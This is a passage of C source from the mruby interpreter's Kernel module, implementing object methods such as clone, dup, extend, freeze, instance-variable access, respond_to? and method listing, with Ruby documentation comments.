mrb_value *bp;
struct RProc *p;
if (ci <= cibase) {
/* toplevel does not have block */
return mrb_false_value();
}
p = ci->proc;
/* search method/class/module proc */
while (p) {
if (MRB_PROC_SCOPE_P(p)) break;
p = p->upper;
}
if (p == NULL) return mrb_false_value();
/* search ci corresponding to proc */
while (cibase < ci) {
if (ci->proc == p) break;
ci--;
}
if (ci == cibase) {
return mrb_false_value();
}
else if (ci->env) {
struct REnv *e = ci->env;
int bidx;
/* top-level does not have block slot (always false) */
if (e->stack == mrb->c->stbase)
return mrb_false_value();
/* use saved block arg position */
bidx = MRB_ENV_BIDX(e);
/* bidx may be useless (e.g. define_method) */
if (bidx >= MRB_ENV_STACK_LEN(e))
return mrb_false_value();
bp = &e->stack[bidx];
}
else {
bp = ci[1].stackent+1;
if (ci->argc >= 0) {
bp += ci->argc;
}
else {
bp++;
}
}
if (mrb_nil_p(*bp))
return mrb_false_value();
return mrb_true_value();
}
/* 15.3.1.3.7 */
/*
* call-seq:
* obj.class -> class
*
* Returns the class of <i>obj</i>. This method must always be
* called with an explicit receiver, as <code>class</code> is also a
* reserved word in Ruby.
*
* 1.class #=> Fixnum
* self.class #=> Object
*/
static mrb_value
mrb_obj_class_m(mrb_state *mrb, mrb_value self)
{
return mrb_obj_value(mrb_obj_class(mrb, self));
}
static struct RClass*
mrb_singleton_class_clone(mrb_state *mrb, mrb_value obj)
{
struct RClass *klass = mrb_basic_ptr(obj)->c;
if (klass->tt != MRB_TT_SCLASS)
return klass;
else {
/* copy singleton(unnamed) class */
struct RClass *clone = (struct RClass*)mrb_obj_alloc(mrb, klass->tt, mrb->class_class);
switch (mrb_type(obj)) {
case MRB_TT_CLASS:
case MRB_TT_SCLASS:
break;
default:
clone->c = mrb_singleton_class_clone(mrb, mrb_obj_value(klass));
break;
}
clone->super = klass->super;
if (klass->iv) {
mrb_iv_copy(mrb, mrb_obj_value(clone), mrb_obj_value(klass));
mrb_obj_iv_set(mrb, (struct RObject*)clone, mrb_intern_lit(mrb, "__attached__"), obj);
}
if (klass->mt) {
clone->mt = kh_copy(mt, mrb, klass->mt);
}
else {
clone->mt = kh_init(mt, mrb);
}
clone->tt = MRB_TT_SCLASS;
return clone;
}
}
static void
copy_class(mrb_state *mrb, mrb_value dst, mrb_value src)
{
struct RClass *dc = mrb_class_ptr(dst);
struct RClass *sc = mrb_class_ptr(src);
/* if the origin is not the same as the class, then the origin and
the current class need to be copied */
if (sc->flags & MRB_FLAG_IS_PREPENDED) {
struct RClass *c0 = sc->super;
struct RClass *c1 = dc;
/* copy prepended iclasses */
while (!(c0->flags & MRB_FLAG_IS_ORIGIN)) {
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1 = c1->super;
c0 = c0->super;
}
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1->super->flags |= MRB_FLAG_IS_ORIGIN;
}
if (sc->mt) {
dc->mt = kh_copy(mt, mrb, sc->mt);
}
else {
dc->mt = kh_init(mt, mrb);
}
dc->super = sc->super;
MRB_SET_INSTANCE_TT(dc, MRB_INSTANCE_TT(sc));
}
static void
init_copy(mrb_state *mrb, mrb_value dest, mrb_value obj)
{
switch (mrb_type(obj)) {
case MRB_TT_ICLASS:
copy_class(mrb, dest, obj);
return;
case MRB_TT_CLASS:
case MRB_TT_MODULE:
copy_class(mrb, dest, obj);
mrb_iv_copy(mrb, dest, obj);
mrb_iv_remove(mrb, dest, mrb_intern_lit(mrb, "__classname__"));
break;
case MRB_TT_OBJECT:
case MRB_TT_SCLASS:
case MRB_TT_HASH:
case MRB_TT_DATA:
case MRB_TT_EXCEPTION:
mrb_iv_copy(mrb, dest, obj);
break;
case MRB_TT_ISTRUCT:
mrb_istruct_copy(dest, obj);
break;
default:
break;
}
mrb_funcall(mrb, dest, "initialize_copy", 1, obj);
}
/* 15.3.1.3.8 */
/*
* call-seq:
* obj.clone -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference. Copies
* the frozen state of <i>obj</i>. See also the discussion
* under <code>Object#dup</code>.
*
* class Klass
* attr_accessor :str
* end
* s1 = Klass.new #=> #<Klass:0x401b3a38>
* s1.str = "Hello" #=> "Hello"
* s2 = s1.clone #=> #<Klass:0x401b3998 @str="Hello">
* s2.str[1,4] = "i" #=> "i"
* s1.inspect #=> "#<Klass:0x401b3a38 @str=\"Hi\">"
* s2.inspect #=> "#<Klass:0x401b3998 @str=\"Hi\">"
*
* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*
 *  Objects of some classes (TrueClass, FalseClass, NilClass, Symbol, Fixnum
 *  and Float) cannot be cloned.
*/
MRB_API mrb_value
mrb_obj_clone(mrb_state *mrb, mrb_value self)
{
struct RObject *p;
mrb_value clone;
if (mrb_immediate_p(self)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't clone %S", self);
}
if (mrb_type(self) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't clone singleton class");
}
p = (struct RObject*)mrb_obj_alloc(mrb, mrb_type(self), mrb_obj_class(mrb, self));
p->c = mrb_singleton_class_clone(mrb, self);
mrb_field_write_barrier(mrb, (struct RBasic*)p, (struct RBasic*)p->c);
clone = mrb_obj_value(p);
init_copy(mrb, clone, self);
return clone;
}
/* 15.3.1.3.9 */
/*
* call-seq:
* obj.dup -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference.
* <code>dup</code> copies the frozen state of <i>obj</i>. See also
* the discussion under <code>Object#clone</code>. In general,
* <code>clone</code> and <code>dup</code> may have different semantics
* in descendant classes. While <code>clone</code> is used to duplicate
* an object, including its internal state, <code>dup</code> typically
* uses the class of the descendant object to create the new instance.
*
* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*/
MRB_API mrb_value
mrb_obj_dup(mrb_state *mrb, mrb_value obj)
{
struct RBasic *p;
mrb_value dup;
if (mrb_immediate_p(obj)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't dup %S", obj);
}
if (mrb_type(obj) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't dup singleton class");
}
p = mrb_obj_alloc(mrb, mrb_type(obj), mrb_obj_class(mrb, obj));
dup = mrb_obj_value(p);
init_copy(mrb, dup, obj);
return dup;
}
static mrb_value
mrb_obj_extend(mrb_state *mrb, mrb_int argc, mrb_value *argv, mrb_value obj)
{
mrb_int i;
if (argc == 0) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "wrong number of arguments (at least 1)");
}
for (i = 0; i < argc; i++) {
mrb_check_type(mrb, argv[i], MRB_TT_MODULE);
}
while (argc--) {
mrb_funcall(mrb, argv[argc], "extend_object", 1, obj);
mrb_funcall(mrb, argv[argc], "extended", 1, obj);
}
return obj;
}
/* 15.3.1.3.13 */
/*
* call-seq:
* obj.extend(module, ...) -> obj
*
* Adds to _obj_ the instance methods from each module given as a
* parameter.
*
* module Mod
* def hello
* "Hello from Mod.\n"
* end
* end
*
* class Klass
* def hello
* "Hello from Klass.\n"
* end
* end
*
* k = Klass.new
* k.hello #=> "Hello from Klass.\n"
* k.extend(Mod) #=> #<Klass:0x401b3bc8>
* k.hello #=> "Hello from Mod.\n"
*/
static mrb_value
mrb_obj_extend_m(mrb_state *mrb, mrb_value self)
{
mrb_value *argv;
mrb_int argc;
mrb_get_args(mrb, "*", &argv, &argc);
return mrb_obj_extend(mrb, argc, argv, self);
}
static mrb_value
mrb_obj_freeze(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return self;
default:
break;
}
b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
MRB_SET_FROZEN_FLAG(b);
}
return self;
}
static mrb_value
mrb_obj_frozen(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return mrb_true_value();
default:
break;
}
b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
return mrb_false_value();
}
return mrb_true_value();
}
/* 15.3.1.3.15 */
/*
* call-seq:
* obj.hash -> fixnum
*
* Generates a <code>Fixnum</code> hash value for this object. This
* function must have the property that <code>a.eql?(b)</code> implies
* <code>a.hash == b.hash</code>. The hash value is used by class
* <code>Hash</code>. Any hash value that exceeds the capacity of a
* <code>Fixnum</code> will be truncated before being used.
*/
MRB_API mrb_value
mrb_obj_hash(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.3.16 */
static mrb_value
mrb_obj_init_copy(mrb_state *mrb, mrb_value self)
{
mrb_value orig;
mrb_get_args(mrb, "o", &orig);
if (mrb_obj_equal(mrb, self, orig)) return self;
if ((mrb_type(self) != mrb_type(orig)) || (mrb_obj_class(mrb, self) != mrb_obj_class(mrb, orig))) {
mrb_raise(mrb, E_TYPE_ERROR, "initialize_copy should take same class object");
}
return self;
}
MRB_API mrb_bool
mrb_obj_is_instance_of(mrb_state *mrb, mrb_value obj, struct RClass* c)
{
if (mrb_obj_class(mrb, obj) == c) return TRUE;
return FALSE;
}
/* 15.3.1.3.19 */
/*
* call-seq:
* obj.instance_of?(class) -> true or false
*
* Returns <code>true</code> if <i>obj</i> is an instance of the given
* class. See also <code>Object#kind_of?</code>.
*/
static mrb_value
obj_is_instance_of(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_instance_of(mrb, self, mrb_class_ptr(arg)));
}
/* 15.3.1.3.20 */
/*
* call-seq:
* obj.instance_variable_defined?(symbol) -> true or false
*
* Returns <code>true</code> if the given instance variable is
* defined in <i>obj</i>.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_defined?(:@a) #=> true
* fred.instance_variable_defined?("@b") #=> true
* fred.instance_variable_defined?("@c") #=> false
*/
static mrb_value
mrb_obj_ivar_defined(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
return mrb_bool_value(mrb_iv_defined(mrb, self, sym));
}
/* 15.3.1.3.21 */
/*
* call-seq:
* obj.instance_variable_get(symbol) -> obj
*
* Returns the value of the given instance variable, or nil if the
* instance variable is not set. The <code>@</code> part of the
* variable name should be included for regular instance
* variables. Throws a <code>NameError</code> exception if the
* supplied symbol is not valid as an instance variable name.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_get(:@a) #=> "cat"
* fred.instance_variable_get("@b") #=> 99
*/
static mrb_value
mrb_obj_ivar_get(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_get_args(mrb, "n", &iv_name);
mrb_iv_check(mrb, iv_name);
return mrb_iv_get(mrb, self, iv_name);
}
/* 15.3.1.3.22 */
/*
* call-seq:
* obj.instance_variable_set(symbol, obj) -> obj
*
* Sets the instance variable names by <i>symbol</i> to
* <i>object</i>, thereby frustrating the efforts of the class's
* author to attempt to provide proper encapsulation. The variable
* did not have to exist prior to this call.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_set(:@a, 'dog') #=> "dog"
* fred.instance_variable_set(:@c, 'cat') #=> "cat"
* fred.inspect #=> "#<Fred:0x401b3da8 @a=\"dog\", @b=99, @c=\"cat\">"
*/
static mrb_value
mrb_obj_ivar_set(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_value val;
mrb_get_args(mrb, "no", &iv_name, &val);
mrb_iv_check(mrb, iv_name);
mrb_iv_set(mrb, self, iv_name, val);
return val;
}
/* 15.3.1.3.24 */
/* 15.3.1.3.26 */
/*
* call-seq:
* obj.is_a?(class) -> true or false
* obj.kind_of?(class) -> true or false
*
* Returns <code>true</code> if <i>class</i> is the class of
* <i>obj</i>, or if <i>class</i> is one of the superclasses of
* <i>obj</i> or modules included in <i>obj</i>.
*
* module M; end
* class A
* include M
* end
* class B < A; end
* class C < B; end
* b = B.new
* b.instance_of? A #=> false
* b.instance_of? B #=> true
* b.instance_of? C #=> false
* b.instance_of? M #=> false
* b.kind_of? A #=> true
* b.kind_of? B #=> true
* b.kind_of? C #=> false
* b.kind_of? M #=> true
*/
static mrb_value
mrb_obj_is_kind_of_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_kind_of(mrb, self, mrb_class_ptr(arg)));
}
KHASH_DECLARE(st, mrb_sym, char, FALSE)
KHASH_DEFINE(st, mrb_sym, char, FALSE, kh_int_hash_func, kh_int_hash_equal)
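/* collect every defined (non-undef) method symbol from klass' method table
 * into the khash set, which acts as a de-duplicating accumulator */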
static void
method_entry_loop(mrb_state *mrb, struct RClass* klass, khash_t(st)* set)
{
khint_t i;
khash_t(mt) *h = klass->mt;
if (!h || kh_size(h) == 0) return;
for (i=0;i<kh_end(h);i++) {
if (kh_exist(h, i)) {
mrb_method_t m = kh_value(h, i);
if (MRB_METHOD_UNDEF_P(m)) continue;
kh_put(st, mrb, set, kh_key(h, i));
}
}
}
mrb_value
mrb_class_instance_method_list(mrb_state *mrb, mrb_bool recur, struct RClass* klass, int obj)
{
khint_t i;
mrb_value ary;
mrb_bool prepended = FALSE;
struct RClass* oldklass;
khash_t(st)* set = kh_init(st, mrb);
if (!recur && (klass->flags & MRB_FLAG_IS_PREPENDED)) {
MRB_CLASS_ORIGIN(klass);
prepended = TRUE;
}
oldklass = 0;
while (klass && (klass != oldklass)) {
method_entry_loop(mrb, klass, set);
if ((klass->tt == MRB_TT_ICLASS && !prepended) ||
(klass->tt == MRB_TT_SCLASS)) {
}
else {
if (!recur) break;
}
oldklass = klass;
klass = klass->super;
}
ary = mrb_ary_new_capa(mrb, kh_size(set));
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_singleton_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj)
{
khint_t i;
mrb_value ary;
struct RClass* klass;
khash_t(st)* set = kh_init(st, mrb);
klass = mrb_class(mrb, obj);
if (klass && (klass->tt == MRB_TT_SCLASS)) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
if (recur) {
while (klass && ((klass->tt == MRB_TT_SCLASS) || (klass->tt == MRB_TT_ICLASS))) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
}
ary = mrb_ary_new(mrb);
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj, mrb_method_flag_t flag)
{
return mrb_class_instance_method_list(mrb, recur, mrb_class(mrb, obj), 0);
}
/* 15.3.1.3.31 */
/*
* call-seq:
* obj.methods -> array
*
* Returns a list of the names of methods publicly accessible in
* <i>obj</i>. This will include all the methods accessible in
* <i>obj</i>'s ancestors.
*
* class Klass
* def kMethod()
* end
* end
* k = Klass.new
* k.methods[0..9] #=> [:kMethod, :respond_to?, :nil?, :is_a?,
* # :class, :instance_variable_set,
* # :methods, :extend, :__send__, :instance_eval]
* k.methods.length #=> 42
*/
static mrb_value
mrb_obj_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, (mrb_method_flag_t)0); /* everything but private */
}
/* 15.3.1.3.32 */
/*
* call_seq:
* nil.nil? -> true
* <anything_else>.nil? -> false
*
* Only the object <i>nil</i> responds <code>true</code> to <code>nil?</code>.
*/
static mrb_value
mrb_false(mrb_state *mrb, mrb_value self)
{
return mrb_false_value();
}
/* 15.3.1.3.36 */
/*
* call-seq:
* obj.private_methods(all=true) -> array
*
* Returns the list of private methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_private_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PRIVATE); /* private attribute not define */
}
/* 15.3.1.3.37 */
/*
* call-seq:
* obj.protected_methods(all=true) -> array
*
* Returns the list of protected methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_protected_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PROTECTED); /* protected attribute not define */
}
/* 15.3.1.3.38 */
/*
* call-seq:
* obj.public_methods(all=true) -> array
*
* Returns the list of public methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_public_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PUBLIC); /* public attribute not define */
}
/* 15.3.1.2.12 */
/* 15.3.1.3.40 */
/*
* call-seq:
* raise
* raise(string)
* raise(exception [, string])
*
* With no arguments, raises a <code>RuntimeError</code>
* With a single +String+ argument, raises a
* +RuntimeError+ with the string as a message. Otherwise,
* the first parameter should be the name of an +Exception+
* class (or an object that returns an +Exception+ object when sent
* an +exception+ message). The optional second parameter sets the
* message associated with the exception, and the third parameter is an
* array of callback information. Exceptions are caught by the
* +rescue+ clause of <code>begin...end</code> blocks.
*
* raise "Failed to create socket"
* raise ArgumentError, "No parameters", caller
*/
MRB_API mrb_value
mrb_f_raise(mrb_state *mrb, mrb_value self)
{
mrb_value a[2], exc;
mrb_int argc;
argc = mrb_get_args(mrb, "|oo", &a[0], &a[1]);
switch (argc) {
case 0:
mrb_raise(mrb, E_RUNTIME_ERROR, "");
break;
case 1:
if (mrb_string_p(a[0])) {
a[1] = a[0];
argc = 2;
a[0] = mrb_obj_value(E_RUNTIME_ERROR);
}
/* fall through */
default:
exc = mrb_make_exception(mrb, argc, a);
mrb_exc_raise(mrb, exc);
break;
}
return mrb_nil_value(); /* not reached */
}
static mrb_value
mrb_krn_class_defined(mrb_state *mrb, mrb_value self)
{
mrb_value str;
mrb_get_args(mrb, "S", &str);
return mrb_bool_value(mrb_class_defined(mrb, RSTRING_PTR(str)));
}
/* 15.3.1.3.41 */
/*
* call-seq:
* obj.remove_instance_variable(symbol) -> obj
*
* Removes the named instance variable from <i>obj</i>, returning that
* variable's value.
*
* class Dummy
* attr_reader :var
* def initialize
* @var = 99
* end
* def remove
* remove_instance_variable(:@var)
* end
* end
* d = Dummy.new
* d.var #=> 99
* d.remove #=> 99
* d.var #=> nil
*/
static mrb_value
mrb_obj_remove_instance_variable(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_value val;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
val = mrb_iv_remove(mrb, self, sym);
if (mrb_undef_p(val)) {
mrb_name_error(mrb, sym, "instance variable %S not defined", mrb_sym2str(mrb, sym));
}
return val;
}
void
mrb_method_missing(mrb_state *mrb, mrb_sym name, mrb_value self, mrb_value args)
{
mrb_no_method_error(mrb, name, args, "undefined method '%S'", mrb_sym2str(mrb, name));
}
/* 15.3.1.3.30 */
/*
* call-seq:
* obj.method_missing(symbol [, *args] ) -> result
*
* Invoked by Ruby when <i>obj</i> is sent a message it cannot handle.
* <i>symbol</i> is the symbol for the method called, and <i>args</i>
* are any arguments that were passed to it. By default, the interpreter
* raises an error when this method is called. However, it is possible
* to override the method to provide more dynamic behavior.
* If it is decided that a particular method should not be handled, then
* <i>super</i> should be called, so that ancestors can pick up the
* missing method.
* The example below creates
* a class <code>Roman</code>, which responds to methods with names
* consisting of roman numerals, returning the corresponding integer
* values.
*
* class Roman
* def romanToInt(str)
* # ...
* end
* def method_missing(methId)
* str = methId.id2name
* romanToInt(str)
* end
* end
*
* r = Roman.new
* r.iv #=> 4
* r.xxiii #=> 23
* r.mm #=> 2000
*/
#ifdef MRB_DEFAULT_METHOD_MISSING
static mrb_value
mrb_obj_missing(mrb_state *mrb, mrb_value mod)
{
mrb_sym name;
mrb_value *a;
mrb_int alen;
mrb_get_args(mrb, "n*!", &name, &a, &alen);
mrb_method_missing(mrb, name, mod, mrb_ary_new_from_values(mrb, alen, a));
/* not reached */
return mrb_nil_value();
}
#endif
static inline mrb_bool
basic_obj_respond_to(mrb_state *mrb, mrb_value obj, mrb_sym id, int pub)
{
return mrb_respond_to(mrb, obj, id);
}
/* 15.3.1.3.43 */
/*
* call-seq:
* obj.respond_to?(symbol, include_private=false) -> true or false
*
* Returns +true+ if _obj_ responds to the given
* method. Private methods are included in the search only if the
* optional second parameter evaluates to +true+.
*
* If the method is not implemented,
* as Process.fork on Windows, File.lchmod on GNU/Linux, etc.,
* false is returned.
*
* If the method is not defined, <code>respond_to_missing?</code>
* method is called and the result is returned.
*/
static mrb_value
obj_respond_to(mrb_state *mrb, mrb_value self)
{
mrb_value mid;
mrb_sym id, rtm_id;
mrb_bool priv = FALSE, respond_to_p = TRUE;
mrb_get_args(mrb, "o|b", &mid, &priv);
if (mrb_symbol_p(mid)) {
id = mrb_symbol(mid);
}
else {
mrb_value tmp;
if (mrb_string_p(mid)) {
tmp = mrb_check_intern_str(mrb, mid);
}
else {
tmp = mrb_check_string_type(mrb, mid);
if (mrb_nil_p(tmp)) {
tmp = mrb_inspect(mrb, mid);
mrb_raisef(mrb, E_TYPE_ERROR, "%S is not a symbol", tmp);
}
tmp = mrb_check_intern_str(mrb, tmp);
}
if (mrb_nil_p(tmp)) {
respond_to_p = FALSE;
}
else {
id = mrb_symbol(tmp);
}
}
if (respond_to_p) {
respond_to_p = basic_obj_respond_to(mrb, self, id, !priv);
}
if (!respond_to_p) {
rtm_id = mrb_intern_lit(mrb, "respond_to_missing?");
if (basic_obj_respond_to(mrb, self, rtm_id, !priv)) {
mrb_value args[2], v;
args[0] = mid;
args[1] = mrb_bool_value(priv);
v = mrb_funcall_argv(mrb, self, rtm_id, 2, args);
return mrb_bool_value(mrb_bool(v));
}
}
return mrb_bool_value(respond_to_p);
}
/* 15.3.1.3.45 */
/*
* call-seq:
* obj.singleton_methods(all=true) -> array
*
* Returns an array of the names of singleton methods for <i>obj</i>.
* If the optional <i>all</i> parameter is true, the list will include
* methods in modules included in <i>obj</i>.
* Only public and protected singleton methods are returned.
*
* module Other
* def three() end
* end
*
* class Single
* def Single.four() end
* end
*
* a = Single.new
*
* def a.one()
* end
*
* class << a
* include Other
* def two()
* end
* end
*
* Single.singleton_methods #=> [:four]
* a.singleton_methods(false) #=> [:two, :one]
* a.singleton_methods #=> [:two, :one, :three]
*/
static mrb_value
mrb_obj_singleton_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_singleton_methods(mrb, recur, self);
}
static mrb_value
mod_define_singleton_method(mrb_state *mrb, mrb_value self)
{
struct RProc *p;
mrb_method_t m;
mrb_sym mid;
mrb_value blk = mrb_nil_value();
mrb_get_args(mrb, "n&", &mid, &blk);
if (mrb_nil_p(blk)) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "no block given");
}
p = (struct RProc*)mrb_obj_alloc(mrb, MRB_TT_PROC, mrb->proc_class);
mrb_proc_copy(p, mrb_proc_ptr(blk));
p->flags |= MRB_PROC_STRICT;
MRB_METHOD_FROM_PROC(m, p);
mrb_define_method_raw(mrb, mrb_class_ptr(mrb_singleton_class(mrb, self)), mid, m);
return mrb_symbol_value(mid);
}
static mrb_value
mrb_obj_ceqq(mrb_state *mrb, mrb_value self)
{
mrb_value v;
mrb_int i, len;
mrb_sym eqq = mrb_intern_lit(mrb, "===");
mrb_value ary = mrb_ary_splat(mrb, self);
mrb_get_args(mrb, "o", &v);
len = RARRAY_LEN(ary);
for (i=0; i<len; i++) {
mrb_value c = mrb_funcall_argv(mrb, mrb_ary_entry(ary, i), eqq, 1, &v);
if (mrb_test(c)) return mrb_true_value();
}
return mrb_false_value();
}
/* 15.3.1.2.7 */
/*
* call-seq:
* local_variables -> array
*
* Returns the names of local variables in the current scope.
*
* [mruby limitation]
* If variable symbol information was stripped out from
* compiled binary files using `mruby-strip -l`, this
* method always returns an empty array.
*/
static mrb_value
mrb_local_variables(mrb_state *mrb, mrb_value self)
{
struct RProc *proc;
mrb_irep *irep;
mrb_value vars;
size_t i;
proc = mrb->c->ci[-1].proc;
if (MRB_PROC_CFUNC_P(proc)) {
return mrb_ary_new(mrb);
}
vars = mrb_hash_new(mrb);
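  /* use a hash as a set so a name shadowed in enclosing scopes is reported
   * only once; walk from the current proc up through its lexically
   * enclosing (non-C) procs */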
while (proc) {
if (MRB_PROC_CFUNC_P(proc)) break;
irep = proc->body.irep;
if (!irep->lv) break;
for (i = 0; i + 1 < irep->nlocals; ++i) {
if (irep->lv[i].name) {
mrb_hash_set(mrb, vars, mrb_symbol_value(irep->lv[i].name), mrb_true_value());
}
}
if (!MRB_PROC_ENV_P(proc)) break;
proc = proc->upper;
//if (MRB_PROC_SCOPE_P(proc)) break;
if (!proc->c) break;
}
return mrb_hash_keys(mrb, vars);
}
mrb_value mrb_obj_equal_m(mrb_state *mrb, mrb_value);
void
mrb_init_kernel(mrb_state *mrb)
{
struct RClass *krn;
mrb->kernel_module = krn = mrb_define_module(mrb, "Kernel"); /* 15.3.1 */
mrb_define_class_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.2 */
mrb_define_class_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.2.4 */
mrb_define_class_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.5 */
mrb_define_class_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.2.7 */
; /* 15.3.1.2.11 */
mrb_define_class_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_OPT(2)); /* 15.3.1.2.12 */
mrb_define_method(mrb, krn, "singleton_class", mrb_singleton_class, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "===", mrb_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.2 */
mrb_define_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.6 */
mrb_define_method(mrb, krn, "class", mrb_obj_class_m, MRB_ARGS_NONE()); /* 15.3.1.3.7 */
mrb_define_method(mrb, krn, "clone", mrb_obj_clone, MRB_ARGS_NONE()); /* 15.3.1.3.8 */
mrb_define_method(mrb, krn, "dup", mrb_obj_dup, MRB_ARGS_NONE()); /* 15.3.1.3.9 */
mrb_define_method(mrb, krn, "eql?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.10 */
mrb_define_method(mrb, krn, "equal?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.11 */
mrb_define_method(mrb, krn, "extend", mrb_obj_extend_m, MRB_ARGS_ANY()); /* 15.3.1.3.13 */
mrb_define_method(mrb, krn, "freeze", mrb_obj_freeze, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "frozen?", mrb_obj_frozen, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.3.14 */
mrb_define_method(mrb, krn, "hash", mrb_obj_hash, MRB_ARGS_NONE()); /* 15.3.1.3.15 */
mrb_define_method(mrb, krn, "initialize_copy", mrb_obj_init_copy, MRB_ARGS_REQ(1)); /* 15.3.1.3.16 */
mrb_define_method(mrb, krn, "inspect", mrb_obj_inspect, MRB_ARGS_NONE()); /* 15.3.1.3.17 */
mrb_define_method(mrb, krn, "instance_of?", obj_is_instance_of, MRB_ARGS_REQ(1)); /* 15.3.1.3.19 */
mrb_define_method(mrb, krn, "instance_variable_defined?", mrb_obj_ivar_defined, MRB_ARGS_REQ(1)); /* 15.3.1.3.20 */
mrb_define_method(mrb, krn, "instance_variable_get", mrb_obj_ivar_get, MRB_ARGS_REQ(1)); /* 15.3.1.3.21 */
mrb_define_method(mrb, krn, "instance_variable_set", mrb_obj_ivar_set, MRB_ARGS_REQ(2)); /* 15.3.1.3.22 */
mrb_define_method(mrb, krn, "instance_variables", mrb_obj_instance_variables, MRB_ARGS_NONE()); /* 15.3.1.3.23 */
mrb_define_method(mrb, krn, "is_a?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.24 */
mrb_define_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.25 */
